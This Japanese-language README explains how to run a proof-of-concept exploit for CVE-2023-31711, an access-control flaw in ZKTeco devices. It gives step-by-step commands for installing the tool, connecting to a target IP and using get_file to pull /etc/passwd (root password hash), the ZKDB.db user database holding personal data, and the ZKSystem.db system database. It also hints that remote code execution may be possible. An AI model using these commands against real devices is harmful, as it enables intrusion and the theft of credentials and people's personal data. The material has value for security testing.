CVE-2023-31711
ZKTECOの不正確なアクセス制御により、リモートの攻撃者が管理APIを介して任意のファイルを読み取ることが可能です。
必要なモジュールのインストール
- ZKTEcoディレクトリ内:
$ pip install -r ./pyzatt/requirements_dev.txt
エクスプロイトの実行
- ZKTEcoディレクトリ内:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
例:
get_file /etc/passwd: rootパスワードのハッシュを開示
get_file /mnt/mtdblock/data/ZKDB.db: 登録ユーザーの個人情報を開示。内容を読み取るには、全体の内容が
開示されるまでこのコマンドを順次繰り返し実行する必要があるかもしれません
get_file /mnt/mtdblock/data/ZKSystem.db: システムに関連する機密情報を開示
クレジット
注記
これらのデバイスは、管理APIを介してリモートコード実行にも潜在的に脆弱である可能性があります。クレジットのセクションで言及されているエクスプロイトは、そのテストを見つけるのに適した場所かもしれません。